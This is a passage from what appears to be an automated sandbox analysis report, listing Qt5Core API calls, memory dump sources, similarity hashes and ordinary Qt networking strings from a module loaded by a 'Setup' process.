                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E89
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E94
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320CD
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320E4
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40EDE
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40EE9
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33458
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A3347D
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33494
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40FEB
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41027
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41038
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41043
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A4105C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A4106A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41075
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteLogger@@Message$?data@?size@?warning@Category@@Char@@Enabled@H00@LoggingV0@@Warning$A@$$DateEmpty@Time@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                               • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                               • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?load@?utf16@E__@@Latin1Library@@String@@@SystemV0@@$malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A1C4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A224
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A22E
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A250
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A267
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A271
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A27E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A28B
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2C8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2D2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2DC
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A3D4
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessManager: factory %p has returned an empty result set, xrefs: 00007FFBA197A25D
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@List$?dispose@Data@1@@$Logger@@Message$?warning@Empty@
                                                                                                                                                              • String ID: QNetworkAccessManager: factory %p has returned an empty result set
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QVariant@@QEAA@HPEBXI@Z.QT5CORE ref: 00007FFBA197E465
                                                                                                                                                              • ?setProperty@QObject@@QEAA_NPEBDAEBVQVariant@@@Z.QT5CORE ref: 00007FFBA197E479
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA197E483
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA197E4A1
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA197E534
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA197E594
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA197E5A7
                                                                                                                                                              • ?isLocalFile@QUrl@@QEBA_NXZ.QT5CORE ref: 00007FFBA197E60D
                                                                                                                                                              • ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA197E630
                                                                                                                                                              • ??9QString@@QEBA_NVQLatin1String@@@Z.QT5CORE ref: 00007FFBA197E659
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197E69B
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA197DDB9
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197DDC7
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?reserve@QByteArray@@QEAAXH@Z.QT5CORE ref: 00007FFBA197DDE7
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE ref: 00007FFBA197DDFF
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE ref: 00007FFBA197DE0A
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@PEBD@Z.QT5CORE ref: 00007FFBA197DE16
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE ref: 00007FFBA197DE21
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197DE59
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA197DE6C
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197DE8F
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197DEA0
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@String@@Url@@$ConverterFunction@Type@@$?dispose@?registerData@1@@Data@@Flags@ListObject@@Variant@@$?class?has?host@?reserve@?setAbstractComponentFile@Flag@FormattingLatin1LocalName@NormalizedObject@@@Option@Private@@Property@RegisteredString@@@TypeType@Type@@@@Url@@@@@V0@@Variant@@@
                                                                                                                                                              • String ID: _q_networksession$localhost
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E0D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E1D
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF200
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF218
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF241
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF252
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF262
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF280
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF28E
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF29C
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00DE8
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • CoInitialize.OLE32(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E41
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E59
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E7E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E8C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E9C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00EB7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00EC2
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00ECD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Logger@@Message$Category@@Logging$?warning@Enabled@H00@Warning$String@@String@@@$CreateInit_thread_footerInitializeInstancemalloc
                                                                                                                                                              • String ID: Failed to initialize COM:$Monitor is already active, call stopMonitoring() first
                                                                                                                                                              • API String ID: 1655049193-1295506742
                                                                                                                                                              • Opcode ID: 24cf72056fb79e39a1943d54d2b72835dea6d4187dd0a6fa57f6eb8614c548b4
                                                                                                                                                              • Instruction ID: 72dfdfd376ebbf28536f7ca719707b5f6c3a53706ad95536793c66b25984faab
                                                                                                                                                              • Opcode Fuzzy Hash: 24cf72056fb79e39a1943d54d2b72835dea6d4187dd0a6fa57f6eb8614c548b4
                                                                                                                                                              • Instruction Fuzzy Hash: 4F4130A6B0AB4292EB829B36E51426A63A1FF84B94F444036DF5E07765EF3CE455CF00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197B8BA
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA197B8E2
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B902
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197B91D
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA197B941
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197B973
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B988
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197B9A1
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197B9AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197B9C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9E0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9ED
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::addEntry: overriding active cache entry '%s', xrefs: 00007FFBA197B9B3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Array@@ByteTime@@$BasicData@@HashHash@@Logger@@MessageString@@Timer@@V0@@$?allocate?current?data@?secs?start@?stop@?warning@?willChar@@Grow@Node@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID: QNetworkAccessCache::addEntry: overriding active cache entry '%s'
                                                                                                                                                              • API String ID: 1877290419-1724491869
                                                                                                                                                              • Opcode ID: 5f32abb3641f47d625b455e8e9e1d3d0a25ab24e0b94f46d1454bfe7c8e1da55
                                                                                                                                                              • Instruction ID: 20bb1689d07f37cd7078cacd205f24ca506317907a869b2730f8740d813bfbd7
                                                                                                                                                              • Opcode Fuzzy Hash: 5f32abb3641f47d625b455e8e9e1d3d0a25ab24e0b94f46d1454bfe7c8e1da55
                                                                                                                                                              • Instruction Fuzzy Hash: 1D415D62A09A4682EB51DB32E95426AB361FF84FD8F804032DE5E47B65EF3CD446CB40
                                                                                                                                                              APIs
                                                                                                                                                              • ?getAndRef@ExternalRefCountData@QtSharedPointer@@SAPEAU12@PEBVQObject@@@Z.QT5CORE ref: 00007FFBA1978074
                                                                                                                                                              • ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197811F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA197812D
                                                                                                                                                              • ?connectImpl@QObject@@CA?AVConnection@QMetaObject@@PEBV1@PEAPEAX01PEAVQSlotObjectBase@QtPrivate@@W4ConnectionType@Qt@@PEBHPEBU3@@Z.QT5CORE ref: 00007FFBA197819F
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781AD
                                                                                                                                                              • ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19781D6
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19781E1
                                                                                                                                                              • ?connect@QObject@@QEBA?AVConnection@QMetaObject@@PEBV1@PEBD1W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA197820A
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA1978215
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@Meta$ConnectionType@$?connect?connect@Base@Impl@ObjectPrivate@@Qt@@Qt@@@SlotU3@@$?getCountData@ExternalObject@@@Pointer@@Ref@SharedU12@
                                                                                                                                                              • String ID: 1_q_replyPreSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$1_q_replySslErrors(QList<QSslError>)$2preSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$2sslErrors(QList<QSslError>)
                                                                                                                                                              • API String ID: 2525764155-3276072006
                                                                                                                                                              • Opcode ID: d8f650d1aade913725fb9b69f54b74475846870826a486ca0953309f6e3bfbda
                                                                                                                                                              • Instruction ID: f245c4ded306e6c9b538f03a30db88dc18377e4a7ed074d26ab292d2f5114313
                                                                                                                                                              • Opcode Fuzzy Hash: d8f650d1aade913725fb9b69f54b74475846870826a486ca0953309f6e3bfbda
                                                                                                                                                              • Instruction Fuzzy Hash: 0451547250DB8696E7528F21F8402A9B764FB88BA4F444136EE9D13B64EF3CD599CF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Device@@$Url@@$?flush@FileFormattingString@$?error?translate@?write@Application@@ComponentCoreFlags@Option@Option@2@@@@
                                                                                                                                                              • String ID: QNetworkAccessFileBackend$Write error writing to %1: %2
                                                                                                                                                              • API String ID: 1561919659-2240904960
                                                                                                                                                              • Opcode ID: b4ba73070c0d0319767477b394ad9b29b3bb95b4e59617cf83dd732e5a26fc2e
                                                                                                                                                              • Instruction ID: bc2f6249463524241a2c1242514125b682413fad12bdcf40b594a80b1fc73482
                                                                                                                                                              • Opcode Fuzzy Hash: b4ba73070c0d0319767477b394ad9b29b3bb95b4e59617cf83dd732e5a26fc2e
                                                                                                                                                              • Instruction Fuzzy Hash: E04120A160AB4682DB419B35E4140B96762FF85BB8F500232DE7E17BE4DF3CD44ACB50
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5033
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5047
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5082
                                                                                                                                                                • Part of subcall function 00007FFBA19F5000: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5096
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00007FFBA19F3F30,?,?,00000000,00000000,?,00007FFBA1A02CB9), ref: 00007FFBA19F4190
